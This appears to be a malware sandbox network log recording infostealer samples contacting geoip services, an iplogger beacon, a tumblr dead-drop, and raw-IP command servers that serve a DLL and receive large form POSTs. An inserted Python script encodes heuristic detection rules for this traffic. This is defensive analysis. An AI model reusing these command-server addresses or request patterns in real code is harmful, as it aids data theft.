                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07acda9d0000fdadd03e3000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TBtuKHNpqen6r2PzfRPhjgtCSQnHNqZUWg3D5mYq3%2Fz7GgimJnjm3Z6fAaWC9WHpAdZTwz2509V3nLfiw0yjpwL5uoUFV9UyuP6JDCrqMOa4aLQHsXp8CqBq8JSZxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686173db9ecfdad-PDX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://api.ip.sb/geoip
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.26.13.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /geoip HTTP/1.1
                                                                                                                                                                                        Host: api.ip.sb
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07acdd35000008b6e63a9000000001
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=NVJ%2F3%2FUpEcEloeWe9QxxTA48%2BaWv%2FKIEYOv7CrYMBvnIkmIBDAuOGHcAvov1qiVJ4RdfxecX88x7iUB2X1uKKD5O1VCe4PhSYSw9bigBIotTQp0%2F5hw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861741eb8408b6-SEA
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://sergeevih43.tumblr.com/
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        74.114.154.22:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Host: sergeevih43.tumblr.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:50 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Rid: 7f4b4d723e9646833a4a7ed62c7b3809
                                                                                                                                                                                        P3p: CP="Tumblr's privacy policy is available here: https://www.tumblr.com/policy/en/privacy"
                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552001
                                                                                                                                                                                        X-Tumblr-User: sergeevih43
                                                                                                                                                                                        X-Tumblr-Pixel-0: https://px.srvcs.tumblr.com/impixu?T=1625210208&J=eyJ0eXBlIjoidXJsIiwidXJsIjoiaHR0cDovL3NlcmdlZXZpaDQzLnR1bWJsci5jb20vIiwicmVxdHlwZSI6MCwicm91dGUiOiIvIn0=&U=IGEGNDONAH&K=8c1a1e5356e9e816c61be6355fa27e47192d66f8bcb07ca873516d33062ab0a5
                                                                                                                                                                                        X-Tumblr-Pixel: 1
                                                                                                                                                                                        Link: <https://assets.tumblr.com/images/default_avatar/octahedron_open_128.png>; rel=icon
                                                                                                                                                                                        Set-Cookie: pfg=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.tumblr.com; secure; HttpOnly
                                                                                                                                                                                        X-UA-Compatible: IE=Edge,chrome=1
                                                                                                                                                                                        X-UA-Device: desktop
                                                                                                                                                                                        Vary: X-UA-Device, Accept, Accept-Encoding
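The request records above carry several traits an analyst would flag without needing the response bodies: a loader (md8_8eus.exe) fetching a raw-IP URL with a hard-coded facebook.com Referer and a Chrome 70 User-Agent string, stealer binaries calling api.ip.sb/geoip with no User-Agent at all, a process named SystemNetworkService posting a form body to report7.4.php, and a bare-headers GET to the tumblr profile that the extracted Vidar config lists as its C2. The script below is an added example, not part of this Triage report or of the Hatching tooling: it encodes those observations as heuristic rules and runs them over records transcribed from this page. The HttpRecord class, the browser/geoip/tracker host lists, the rule names and the Chrome-version threshold are all assumptions chosen for the example; the headers in SAMPLE_RECORDS are abbreviated to the ones the rules consult, and the iplogger.org record only carries the headers visible so far on this page.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import urlparse


@dataclass
class HttpRecord:
    """One request as the sandbox lists it: method, URL, originating process, request headers."""
    method: str
    url: str
    process: str
    headers: dict = field(default_factory=dict)


# Processes whose outbound HTTP is expected to look like a browser (assumed list).
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
# Public "where am I" services that infostealers query before exfiltration (assumed list).
GEOIP_HOSTS = {"api.ip.sb", "ip-api.com", "ipinfo.io", "ipapi.co"}
# Link-logger / tracker services used to confirm a victim ran the sample (assumed list).
TRACKER_HOSTS = {"iplogger.org", "iplogger.com"}
# Oldest Chrome major version a real browser would plausibly still report; assumed threshold.
# Chrome 70 (seen above) was nearly three years old when this sample ran in July 2021.
MIN_PLAUSIBLE_CHROME_MAJOR = 80

_IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def triage(rec: HttpRecord) -> list[str]:
    """Return the heuristic tags that fire for one record (empty list = nothing notable)."""
    tags: list[str] = []
    h = {k.lower(): v for k, v in rec.headers.items()}
    parsed = urlparse(rec.url)
    host = (parsed.hostname or "").lower()
    from_browser = rec.process.lower() in BROWSER_PROCESSES
    ua = h.get("user-agent", "")

    # Geolocation lookup from something that is not a browser: classic stealer pre-exfil step.
    if host in GEOIP_HOSTS and not from_browser:
        tags.append("geoip-lookup-by-non-browser")
    # Any hit on a link-logger is a beacon, whoever sent it.
    if host in TRACKER_HOSTS:
        tags.append("iplogger-beacon")
    # A Referer naming one site while the target is a bare IP literal is a hard-coded fake.
    referer = h.get("referer")
    if referer and _IPV4.match(host) and (urlparse(referer).hostname or "").lower() != host:
        tags.append("spoofed-referer-to-ip-host")
    # Malware authors paste a User-Agent once and never update it.
    m = re.search(r"Chrome/(\d+)\.", ua)
    if m and int(m.group(1)) < MIN_PLAUSIBLE_CHROME_MAJOR:
        tags.append("stale-browser-ua")
    # Hand-rolled HTTP clients frequently send no User-Agent at all.
    if not from_browser and "user-agent" not in h:
        tags.append("no-user-agent")
    # Form-encoded POST straight to a PHP script from a non-browser: check-in / report traffic.
    if (rec.method == "POST" and parsed.path.endswith(".php")
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and not from_browser):
        tags.append("form-post-to-php-from-non-browser")
    # Blog/profile pages fetched by an executable are a common dead-drop for C2 config.
    if host.endswith(".tumblr.com") and not from_browser:
        tags.append("tumblr-fetch-by-non-browser")
    return tags


def triage_all(records: list[HttpRecord]) -> dict[str, list[str]]:
    """Map each record's URL to its tags, keeping only records that fired at least one rule."""
    out: dict[str, list[str]] = {}
    for rec in records:
        tags = triage(rec)
        if tags:
            out[rec.url] = tags
    return out


_UA70 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
         "(KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36")
_UA87 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
         "(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36")

# Records transcribed from the report above; headers abbreviated to those the rules use.
SAMPLE_RECORDS = [
    HttpRecord("GET", "http://101.36.107.74/seemorebty/il.php?e=md8_8eus", "md8_8eus.exe",
               {"Referer": "https://www.facebook.com", "User-Agent": _UA70}),
    HttpRecord("GET", "https://api.ip.sb/geoip", "1326211188.exe",
               {"Host": "api.ip.sb", "Connection": "Keep-Alive"}),
    HttpRecord("POST", "http://iw.gamegame.info/report7.4.php", "SystemNetworkService",
               {"Content-Type": "application/x-www-form-urlencoded", "User-Agent": _UA87}),
    HttpRecord("GET", "https://sergeevih43.tumblr.com/", "BN2v6gd1v89066wDB6eRa3Rp.exe",
               {"Host": "sergeevih43.tumblr.com"}),
    # Only the headers visible so far on the page for this request.
    HttpRecord("GET", "https://iplogger.org/ZhiS4", "md8_8eus.exe",
               {"Connection": "Keep-Alive"}),
]

if __name__ == "__main__":
    for url, tags in triage_all(SAMPLE_RECORDS).items():
        print(f"{url}\n    {', '.join(tags)}")
```

The rules are deliberately coarse: the point is that process name plus request headers alone separate every record on this page from ordinary browser traffic, before any response is parsed. In a real pipeline the browser allow-list and the Chrome-version floor would be tuned per environment, and the geoip and tracker host lists pulled from threat-intel feeds rather than hard-coded.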
                                                                                                                                                                                      •
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.org/ZhiS4
                                                                                                                                                                                        md8_8eus.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /ZhiS4 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                        Referer: https://www.facebook.com
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
                                                                                                                                                                                        Host: iplogger.org
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:51 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=dae7bd5t7mlhle72gpmp2hadk3; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=23.129.64.153; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253837980; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers: 1
                                                                                                                                                                                        whoami: 1040d55433af5979e0197b9a71a10277fb7dfb4d08fd0d11156f6110a96a3ae2
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      •
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                        34.117.59.81
                                                                                                                                                                                      •
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://ipinfo.io/ip
                                                                                                                                                                                        dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.117.59.81:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /ip HTTP/1.1
                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                        content-length: 13
                                                                                                                                                                                        date: Fri, 02 Jul 2021 07:16:50 GMT
                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                        Alt-Svc: clear
                                                                                                                                                                                      •
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://ipinfo.io/ip
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.117.59.81:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /ip HTTP/1.1
                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                        content-length: 13
                                                                                                                                                                                        date: Fri, 02 Jul 2021 07:16:51 GMT
                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                        Alt-Svc: clear
                                                                                                                                                                                      •
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://ipinfo.io/ip
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.117.59.81:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /ip HTTP/1.1
                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                        content-length: 13
                                                                                                                                                                                        date: Fri, 02 Jul 2021 07:16:51 GMT
                                                                                                                                                                                        x-envoy-upstream-service-time: 0
                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                        Alt-Svc: clear
                                                                                                                                                                                      •
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://rdanoriran.xyz/
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.183.98.8:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Host: rdanoriran.xyz
                                                                                                                                                                                        Content-Length: 1869023
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:42 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Keep-Alive: timeout=3
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      •
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://rdanoriran.xyz/
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.183.98.8:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                        Host: rdanoriran.xyz
                                                                                                                                                                                        Content-Length: 1869009
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:18:02 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Keep-Alive: timeout=3
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      •
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://157.90.127.76/903
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /903 HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                                                                        Content-Length: 25
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:55 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://157.90.127.76/nss3.dll
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /nss3.dll HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:58 GMT
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                        Content-Length: 1246160
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                                                                        ETag: "1303d0-57aa1f0b0df80"
                                                                                                                                                                                        Expires: Sat, 03 Jul 2021 07:16:58 GMT
                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                        X-Cache-Status: EXPIRED
                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://157.90.127.76/
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                                                                        Content-Length: 77783
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:41 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        157.240.240.35
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.240.240.35:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Set-Cookie: fr=1TYafuTm3qyg24Dso..Bg3r1r.bo.AAA.0.0.Bg3r1r.AWVmi6duMfg; expires=Thu, 30-Sep-2021 07:16:58 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        Set-Cookie: sb=a73eYDCu6BxFI-fD56NL4l9K; expires=Sun, 02-Jul-2023 07:16:59 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        x-fb-rlafr: 0
                                                                                                                                                                                        Alt-Svc: h2="facebook22esateyt47yqg6mzpwcnnoi4xims3yqe5b4peowxkilsyyd.onion:443"; ma=86400
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                        Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                        X-FB-Debug: zV9Y88mM2DsK7GB/oxYMB3Uw7yxZp+OpopavJWqy3v9uzE5J1sD1FNZVSsza9JR/dCe1Lqe5SxtcpkYFeR036w==
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:59 GMT
                                                                                                                                                                                        Priority: u=3,i
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.240.240.35:443
                                                                                                                                                                                        Request
GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: fr=1qp8RLbZ6dH1LYwH0..Bg3r1y.nc.AAA.0.0.Bg3r1y.AWXCbIGmnXI; expires=Thu, 30-Sep-2021 07:17:05 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
Set-Cookie: sb=cr3eYF_EHlUZ0rHGfXGpSrny; expires=Sun, 02-Jul-2023 07:17:06 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
x-fb-rlafr: 0
Alt-Svc: h2="facebook26qderizo52pigg5y4a2jsdhqz4odvvusaij4yhxehqngqad.onion:443"; ma=86400
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
